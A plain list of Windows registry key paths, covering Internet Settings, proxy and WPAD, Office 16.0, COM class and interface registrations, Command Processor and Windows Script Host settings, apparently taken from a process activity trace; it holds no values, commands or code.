HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\AllowOnlyDNSQueryForWPAD
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\InMS
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableStackOverwriteProtectionExperiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{00B4EC27-4232-4E72-A012-3497F6C37049}_{0495D47B-5F03-44C4-ADB4-31A6FE3ECD2E}\WpadNetworkName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightingVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AccessPermission
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B06B0CE5-689B-4AFD-B326-0A08A1A647AF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\DllHost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\DllHost.exe
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.vbs\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBSFile\ScriptEngine\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\VBScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
